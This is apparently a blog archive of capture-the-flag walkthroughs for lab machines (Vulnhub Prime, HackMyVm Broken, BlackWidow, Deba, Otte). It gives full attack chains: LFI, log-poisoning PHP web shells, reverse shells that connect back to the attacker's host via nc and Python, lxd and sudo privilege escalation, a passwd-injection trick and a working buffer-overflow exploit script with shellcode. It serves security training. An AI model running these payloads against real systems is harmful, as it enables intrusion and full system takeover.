[22][ssh] host: 192.168.56.99 login: atenea password: sys8423hmv

Login as atenea, check sudo.

atenea@hidden:~$ sudo -l
Matching Defaults entries for atenea on hidden:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User atenea may run the following commands on hidden:
(root) NOPASSWD: /usr/bin/socat


Get root shell using socat.

atenea@hidden:~$ sudo socat stdin exec:/bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
hidden

Vulnhub Prime (2021): 2 Walkthrough

发表评论

Vulnhub Prime (2021): 2 Walkthrough

https://www.vulnhub.com/entry/prime-2021-2,696/

Scan ports.

# Nmap 7.91 scan initiated Wed May 12 17:59:43 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.33.139
 Nmap scan report for 192.168.33.139 (192.168.33.139)
 Host is up (0.0041s latency).
 Not shown: 65530 closed ports
 PORT      STATE SERVICE     VERSION
 22/tcp    open  ssh         OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
 |   256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
 |_  256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
 80/tcp    open  http        Apache httpd 2.4.46 ((Ubuntu))
 |_http-server-header: Apache/2.4.46 (Ubuntu)
 |_http-title: HackerCTF
 139/tcp   open  netbios-ssn Samba smbd 4.6.2
 445/tcp   open  netbios-ssn Samba smbd 4.6.2
 10123/tcp open  http        SimpleHTTPServer 0.6 (Python 3.9.4)
 |_http-server-header: SimpleHTTP/0.6 Python/3.9.4
 |_http-title: Directory listing for /
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 Host script results:
 |_clock-skew: 7h59m59s
 |_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 | smb2-security-mode:
 |   2.02:
 |_    Message signing enabled but not required
 | smb2-time:
 |   date: 2021-05-12T18:00:05
 |_  start_date: N/A

Check smb share folders.

 smbclient -L 192.168.33.139                                                                      fish-0 | 130 [08:45:41]
 Enter WORKGROUP\kali's password:

         Sharename       Type      Comment
         ---------       ----      -------
         print$          Disk      Printer Drivers
         welcome         Disk      Welcome to Hackerctf LAB
         IPC$            IPC       IPC Service (hackerctflab server (Samba, Ubuntu))
 SMB1 disabled -- no workgroup available

Found shell.php in /upload.

```
smbclient '\\192.168.33.139\welcome' fish-0 | 1 [08:47:16]
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 13 04:27:52 2021
.. D 0 Sat May 8 02:38:58 2021
.mysql_history H 18 Sat May 8 15:05:03 2021
.ssh DH 0 Thu May 13 04:29:18 2021
.profile H 807 Sat Mar 20 00:02:58 2021
upload D 0 Sun May 9 19:19:02 2021
.sudo_as_admin_successful H 0 Sat May 8 13:34:48 2021
.bash_logout H 220 Sat Mar 20 00:02:58 2021
.cache DH 0 Sat May 8 02:39:15 2021
something N 82 Sat May 8 00:18:09 2021
secrets N 0 Sat May 8 00:15:17 2021
.bash_history H 72 Sun May 9 19:23:26 2021
.bashrc H 3771 Sat Mar 20 00:02:58 2021

             19475088 blocks of size 1024. 9885876 blocks available

smb: \> cd upload
smb: \upload\> dir
. D 0 Sun May 9 19:19:02 2021
.. D 0 Thu May 13 04:27:52 2021
shell.php A 35 Sun May 9 19:19:02 2021

             19475088 blocks of size 1024. 9885872 blocks available

smb: \upload\> get shell.php
getting file \upload\shell.php of size 35 as shell.php (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
smb: \upload\>


Check shell.php.

cat shell.php smbclient-0 | 0 [08:48:39]
<?php echo system($_GET['cmd']);?>


Found user name jarves.

cat something fish-0 | 0 [09:29:34]
I wanted to make it my home directory. But idea must be changed.

Thanks,
jarves


Scan folders of port 80.

cat 80.log fish-0 | 0 [09:30:32]
/css (Status: 301) [Size: 314] [--> http://192.168.33.139/css/]
/server (Status: 301) [Size: 317] [--> http://192.168.33.139/server/]
/wp (Status: 301) [Size: 313] [--> http://192.168.33.139/wp/]
/index.html (Status: 200) [Size: 5761]
/images (Status: 301) [Size: 317] [--> http://192.168.33.139/images/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.139/javascript/]


Check vulnerability of wordpress, found 1 user and 1 vulnerable plugin.

wpscan --url http://192.168.33.139/wp/ -e u,ap --no-banner --api-token yourtoken --force --plugins-detection aggressive ... [+] gracemedia-media-player	Location: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/	Latest Version: 1.0 (up to date)	Last Updated: 2013-07-21T15:09:00.000Z	Readme: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/readme.txt	[!] Directory listing is enabled
Found By: Known Locations (Aggressive Detection)
- http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/, status: 200
[!] 1 vulnerability identified:
[!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
References:
- https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://www.exploit-db.com/exploits/46537/
- https://seclists.org/fulldisclosure/2019/Mar/26

...
[i] User(s) Identified:


The plugin has LFI vulnerability.

searchsploit gracemedia

Exploit Title	Path
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion	php/webapps/46537.txt


Check if LFI works.

curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds
&cfg=../../../../../../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
...


Check if LFI works.

curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)⏎


Visit the following address.

Visit http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.33.128%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27


Get reverse shell.

nc -nlvp 1234 ifconfig-0 | 0 [08:50:29]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.139.
Ncat: Connection from 192.168.33.139:49084.
bash: cannot set terminal process group (971): Inappropriate ioctl for device
bash: no job control in this shell
<t/plugins/gracemedia-media-player/templates/files$

<t/plugins/gracemedia-media-player/templates/files$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Another way to directly get ssh login as jarves is to directly upload authorized_keys through smb.

smbclient '\\192.168.33.139\welcome'
...
smb: \> mkdir .ssh
smb: \> cd .ssh
smb: .ssh\> put authorized_keys
putting file authorized_keys as .ssh\authorized_keys (183.9 kb/s) (average 183.9 kb/s)
smb: .ssh\> chmod 600 authorized_keys
Server doesn't support UNIX CIFS calls.


Check group of jarves.

jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)


Use the classic lxd vulnerability.

lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz --alias myimage
lxd init alpine:v3.12 mypool
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite


Now we are root.

jarves@hackerctflab:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)


Upload authorized_keys to /root/.ssh, get ssh login directly.

ssh root@192.168.33.139
...
root@hackerctflab:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
hackerctflab

HackMyVm Broken Walkthrough

发表评论

HackMyVm Broken Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Broken

Scan ports.

 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 1b:8d:f3:e3:56:64:af:54:df:10:f8:39:ac:ad:c9:2f (RSA)
 |   256 77:c1:f3:e4:6b:96:0f:1e:5c:24:2e:4d:3e:4a:09:80 (ECDSA)
 |_  256 88:05:ef:7a:04:56:f0:59:62:a5:f8:40:32:24:8a:17 (ED25519)
 80/tcp open  http    nginx 1.14.2
 | http-robots.txt: 1 disallowed entry
 |_/textpattern
 |_http-server-header: nginx/1.14.2
 |_http-title: Site doesn't have a title (text/html).

Scan port 80.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ...
 /index.html           (Status: 200) [Size: 3]
 /file.php             (Status: 200) [Size: 0]
 /robots.txt           (Status: 200) [Size: 23]

robots.txt told us there is textpattern cms.

 cat robots.txt  
 Disallow: /textpattern

Fuzz file.php for LFI.

 wfuzz -u 'http://broken/file.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/seclists/Discov
 ery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload                                  
 =====================================================================
 000007535:   200        27 L     40 W       1451 Ch     "file"

Check passwd.

 curl 'http://broken/file.php?file=../../../../etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 heart:x:1000:1000:heart,,,:/home/heart:/bin/bash

...

Write shell code into nginx log file through agent string.

 curl 'http://broken' -A '<?php system($_GET[c]); ?>'  
 :(

Check if shell code works.

 curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=id'
 ...
 192.168.56.150 - - [26/May/2021:22:44:55 -0400] "GET / HTTP/1.1" 200 3 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)

Try get reverse shell code.

 curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=nc%20192.168.56.150%201234%20-e%20/bin/bash'

In another terminal, listen to port and get shell.

 nc -nlvp 1234                                                                                                                                                                                 fish-0 | 0 [20:49:51]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:50004.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Check sudo.

 ww-data@broken:~/html/textpattern/textpattern$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on broken:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on broken:
     (heart) NOPASSWD: /usr/bin/pydoc3.7

Run pydoc3.7 to get shell.

 www-data@broken:/home/heart$ sudo -u heart /usr/bin/pydoc3.7 os
 ...
 :!/bin/sh
 ...
 $ id
 id
 uid=1000(heart) gid=1000(heart) groups=1000(heart),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
 $ pwd
 pwd
 /home/heart
 $

Check sudo again.

 heart@broken:~$ sudo -l
 Matching Defaults entries for heart on broken:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User heart may run the following commands on broken:
     (ALL) NOPASSWD: /usr/bin/patch

Use patch to insert a new user root2 in /etc/passwd with root priviledge.

 heart@broken:~$ cp /etc/passwd ./passwd_new
 heart@broken:~$ openssl passwd mypass
 qQdUCJYw6ARL6
 heart@broken:~$ echo 'root2:qQdUCJYw6ARL6:0:0:root:/root:/bin/bash' >> passwd_new
 heart@broken:~$ diff -u /etc/passwd ./passwd_new > passwd_patch
 heart@broken:~$ sudo patch -i ./passwd_patch /etc/passwd
 patching file /etc/passwd
 heart@broken:~$ su root2
 Password:
 root@broken:/home/heart# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 broken
 root@broken:/home/heart#

HackMyVm BlackWidow Walkthrough

发表评论

HackMyVm BlackWidow Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=BlackWidow

Nmap scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100

 Nmap scan report for 192.168.56.100 (192.168.56.100)                                                                  
 Host is up (0.0024s latency).
 Not shown: 65526 closed ports
 PORT      STATE SERVICE    VERSION
 22/tcp    open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 ...
 80/tcp    open  http       Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 111/tcp   open  rpcbind    2-4 (RPC #100000)
 ...
 2049/tcp  open  nfs_acl    3 (RPC #100227)
 3128/tcp  open  http-proxy Squid http proxy 4.6
 |_http-server-header: squid/4.6
 |_http-title: ERROR: The requested URL could not be retrieved
 38425/tcp open  mountd     1-3 (RPC #100005)
 41727/tcp open  mountd     1-3 (RPC #100005)
 43429/tcp open  nlockmgr   1-4 (RPC #100021)
 55311/tcp open  mountd     1-3 (RPC #100005)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 84]
 /docs                 (Status: 301) [Size: 315] [--> http://192.168.56.100/docs/]  
 /company              (Status: 301) [Size: 318] [--> http://192.168.56.100/company/]
 /js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]

Check /company, found started.php.

 ~ gobuster dir -u http://192.168.56.100/company -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
   -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80_company.log
 ===============================================================
 /index.html           (Status: 200) [Size: 42271]
 /assets               (Status: 301) [Size: 325] [--> http://192.168.56.100/company/assets/]
 /forms                (Status: 301) [Size: 324] [--> http://192.168.56.100/company/forms/]
 /changelog.txt        (Status: 200) [Size: 1175]
 /Readme.txt           (Status: 200) [Size: 222]
 /started.php          (Status: 200) [Size: 42271]

Check sourcode of /company/index.html.

   <!-- =======================================================
   * Template Name: Arsha - v3.0.3
   * Template URL: https://bootstrapmade.com/arsha-free-bootstrap-html-template-corporate/
   * Author: BootstrapMade.com
   * License: https://bootstrapmade.com/license/
   ========================================================

   We are working to develop a php inclusion method using "file" parameter - Black Widow DevOps Team.

  -->

Wfuzz LFI of started.php with parameter file.

 ~ wfuzz -u 'http://192.168.56.100/company/started.php?file=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt --hh 0
  /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000060:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../etc/passwd"            
 000000062:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../../../../etc/passwd"
 000000061:   200        29 L     43 W       1582 Ch     "../../../../../../../../../../../../../../etc/passwd"        
 000000403:   200        55 L     55 W       727 Ch      "../../../../../../../../../../../../../etc/group"            
 000000404:   200        55 L     55 W       727 Ch      "../../../../../../../../../../../../../../etc/group"

We can read /etc/passwd now.

 ~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../etc/passwd'
 root:x:0:0:root:/root:/bin/bash
 ...
 viper:x:1001:1001:Viper,,,:/home/viper:/bin/bash
 ...

Let's fuzz some log files which we can read.

 wfuzz -u "http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../..FUZZ" -w /usr/share/wordlists/logfiles.txt                                                                        
 ...
 000000031:   200        0 L      0 W        0 Ch        "/var/log/vsftpd.log"
 000000030:   200        0 L      0 W        0 Ch        "/var/log/error.log"
 000000032:   200        0 L      0 W        0 Ch        "/var/log/message"
 000000023:   200        0 L      0 W        0 Ch        "/usr/local/apache/logs/error_log"
 000000025:   200        0 L      0 W        0 Ch        "/var/log/apache/error_log"
 000000026:   200        0 L      0 W        0 Ch        "/var/log/apache2/error_log"
 000000018:   500        0 L      0 W        0 Ch        "/var/log/apache2/access.log"

Take care the response code for /var/log/apache2/access.log is 500, all other file is 200. That's because we run gobuster many times, and access.log file is too big for curl. We reset the VM to original status. Then we can access the file through LFI.

Also, we noticed that browser agent string is in the log file, which can be modified to shell code.

 ~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log'
 192.168.56.150 - - [25/May/2021:04:24:36 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
 192.168.56.150 - - [25/May/2021:04:24:40 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
 192.168.56.150 - - [25/May/2021:04:24:46 -0400] "GET /company/started.php HTTP/1.1" 200 7291 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
 192.168.56.150 - - [25/May/2021:04:24:49 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"

Set user agent to php shell code, and check if it works.

 curl -A '<?php system($_GET[c]); ?>' http://192.168.56.100        
 <html>
 <img src="wallpaper.jpg" alt="wallpaper" width="100%" height="100%">
 </html>

 ~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=id'
 192.168.56.150 - - [25/May/2021:04:25:25 -0400] "GET / HTTP/1.1" 200 334 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)
 "
 192.168.56.150 - - [25/May/2021:04:25:29 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 251 "-" "curl/7.74.0"

In order to get a reverse shell, I tried many ways, at last used the following method. Run a temporary http server locally, with a php shell named "r" at root folder.

 sudo php -S 0.0.0.0:80
 [Tue May 25 19:53:10 2021] PHP 7.4.15 Development Server (http://0.0.0.0:80) started
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 Accepted
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 [200]: (null) /r
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 Closing

On VM, use curl to get reverse shell php named "r" and renamed it to "r.php".

 curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=curl%20http://192.168.56.150/r%20-o%20r.php'

Visit the php shell.

 curl http://192.168.56.100/company/r.php

Then we get reverse shell.

 nc -nlvp 1234                                                                      sudo-0 | 0 [19:54:47]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:48366.
 Linux blackwidow 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
  05:01:50 up 37 min,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Found a strange string in /var/backups/auth.log, which is viper's password. (I think this step is the most hard.)

 Dec 12 16:56:34 test sshd[29558]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.109  user=viper
 Dec 12 16:56:43 test sshd[29560]: Invalid user ?V1p3r2020!? from 192.168.1.109 port 7090
 Dec 12 16:56:44 test sshd[29560]: pam_unix(sshd:auth): check pass; user unknown

Check bash history of viper.

 viper@blackwidow:~$ cat .bash_history
 ...
 arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 ls                                                  
 ./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 su root

Search file named arsenic.

 viper@blackwidow:~$ find / -name arsenic 2>/dev/null
 /home/viper/backup_site/assets/vendor/weapon/arsenic

Su root.

 viper@blackwidow:~$ /home/viper/backup_site/assets/vendor/weapon/arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 # id                                                
 uid=0(root) gid=1001(viper) groups=1001(viper)

HackMyVm Deba Walkthrough

发表评论

HackMyVm Deba Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Deba

Scan ports, found 22, 80 and 3000 are open.

 # Nmap 7.91 scan initiated Fri May 14 08:30:51 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100 (192.168.56.100)
 Host is up (0.0012s latency).
 Not shown: 65532 closed ports
 PORT     STATE SERVICE VERSION
 22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 22:e4:1e:f3:f6:82:7b:26:da:13:2f:01:f9:d5:0d:5b (RSA)
 |   256 7b:09:3e:d4:a7:2d:92:01:9d:7d:7f:32:c1:fd:93:5b (ECDSA)
 |_  256 56:fd:3d:c2:19:fe:22:24:ca:2c:f8:07:90:1d:76:87 (ED25519)
 80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title (text/html; charset=utf-8).

Scan port 80, found nothing. Check port 3000, looks like a node.js site.

[image-20210524174309208.png]

Use the classic Node.JS - 'node-serialize' Remote Code Execution POC at: https://www.exploit-db.com/exploits/49552.

Get reverse shell as www-data. Check sudo.

 www-data@debian:/home/low$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on debian:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on debian:
     (ALL : low) NOPASSWD: /usr/bin/python3 /home/low/scripts/script.py

Check files and content of /home/low/scripts, we have write permission of main.py.

 www-data@debian:/home/low/scripts$ ls -la
 ls -la
 total 16
 drwxr-xr-x 2 low      low      4096 may  7 17:59 .
 drwxr-xr-x 8 low      low      4096 may  7 23:45 ..
 -rwxr-xr-x 1 www-data www-data   88 may  7 10:57 main.py
 -rw-r--r-- 1 low      low        80 may  7 10:44 script.py

 www-data@debian:/home/low/scripts$ cat script.py
 cat script.py
 import main
 import os
 print("\n")
 os.system("ip a | grep enp0s3")
 print("\n")

 www-data@debian:/home/low/scripts$ cat main.py
 cat main.py
 from os import system as main
 print("\n")
 print("Just main")
 main("whoami")
 print("\n")

Modify main.py to get shell as user low.

 echo 'import os;os.system("/bin/bash");' > main.py
 sudo -u low python3 /home/low/scripts/script.py
 low@debian:~/scripts$ id
 id
 uid=1001(low) gid=1001(low) grupos=1001(low)

Upload id_rsa.pub to get ssh access as user low.

 wget http://192.168.56.150/id_rsa.pub -O authorized_keys
 chmod 600 authorized_keys

After login as low, check pspy64. The user debian with id 1000 will run /home/debian/Documentos/backup/dissapeared.py each minute.

 2021/05/14 05:31:02 CMD: UID=0    PID=2240   | /usr/sbin/CRON -f
 2021/05/14 05:31:02 CMD: UID=1000 PID=2241   | /usr/bin/python3 /home/debian/Documentos/backup/dissapeared.py

Create the file and write shell code in it.

 low@debian:/home/debian/Documentos/backup$ echo 'import os;os.system("nc 192.168.56.150 2234 -e /bin/bash");' > dissapeared.py

Get reverse shell as user debain.

 nc -nlvp 2234      
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::2234
 Ncat: Listening on 0.0.0.0:2234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:45812.
 id
 uid=1000(debian) gid=1000(debian) grupos=1000(debian),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),114(lpadmin),115(scanner)

Spwan an interactive shell.

 python3 -c 'import pty;pty.spawn("/bin/bash")'

Here, we can upload id_rsa.pub again, to get ssh login.

Check sudo again.

 debian@debian:~$ sudo -l
 Matching Defaults entries for debian on debian:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User debian may run the following commands on debian:
     (ALL : root) NOPASSWD: /bin/wine /opt/Buffer-Overflow-Vulnerable-app/brainfuck.exe

Run brainfuck.exe, it will open port 9999 and receive user input.

image-20210524180541022.png

Dissassemble brainfuck.exe, the vulnerability is at get_reply function.

 int __cdecl get_reply(char *Source)
 {
   size_t v1; // eax
   char Destination[520]; // [esp+10h] [ebp-208h] BYREF

   printf("[get_reply] s = [%s]\n", Source);
   strcpy(Destination, Source);
   v1 = strlen(Destination);
   printf("[get_reply] copied %d bytes to buffer\n", v1);
   return strcmp(Destination, "shitstorm\n");
 }

The max length of user input string is 520, then 4 bytes for ebp, 4 bytes for return address. We can generate test string.

 python3 -c "print('a'*520+'bbbb'+'cccc')"                                                                                                                                                                                  python3-0 | 1 [17:17:10]
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc

Test it on windows, debug it with ollydbg, the return address is JUST overwrited by 'cccc'.

[image-20210524172438560.png]

Brainfuck.exe also has jmp esp instruction.

 ropper --file brainfuck.exe --search 'jmp esp'                                                                                                                                                                         fish-0 | 0 [17:21:23]
 [INFO] Load gadgets for section: .text
 [LOAD] loading... 100%
 [LOAD] removing double gadgets... 100%
 [INFO] Searching for gadgets: jmp esp

 [INFO] File: brainfuck.exe
 0x311712f3: jmp esp;

Then we can make pwn code with class shell code.

 #!/usr/bin/python3
 import socket
 target_ip='192.168.56.100'
 target_port=9999
 recv_buf=4096
 junk = b'a' *520+b'bbbb'
 ret_addr=b'\xf3\x12\x17\x31'
 #the classic shellcode
 shell_code = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80'
 payload = b''
 payload += junk
 payload += ret_addr
 payload +=shell_code
 with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as clientSock:
     clientSock.connect((target_ip,target_port))
     data_from_srv = clientSock.recv(recv_buf)
     print(f"Reply --> {data_from_srv}")
     print(f"Sending --> {payload}")
     clientSock.sendall(payload)

Start brainfuck.exe with sudo, run exp.py at local machine, then we can get root shell.

HackMyVm Otte Walkthrough

发表评论

HackMyVm Otte Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Otte

Scan ports first.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100 (192.168.56.100)
 Host is up (0.00099s latency).
 Not shown: 65532 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     ProFTPD
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rw-r--r--   1 ftp      ftp            89 May 15 12:25 note.txt
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 e8:38:58:1b:75:c5:53:47:32:10:d4:12:79:69:c8:ad (RSA)
 |   256 35:92:34:4e:cd:65:c6:08:20:76:35:ba:d9:09:64:65 (ECDSA)
 |_  256 a2:87:9f:60:a4:0d:c5:43:6a:4f:02:79:56:ff:6e:d9 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38
 | http-auth:
 | HTTP/1.1 401 Unauthorized\x0D
 |_  Basic realm=Siemens - Root authentification
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: 401 Unauthorized
 Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Visit ftp anonymous, get note.txt.

 cat note.txt
 Hi thomas ! I put on you personal folder the php code you asked me !

 See you later +++

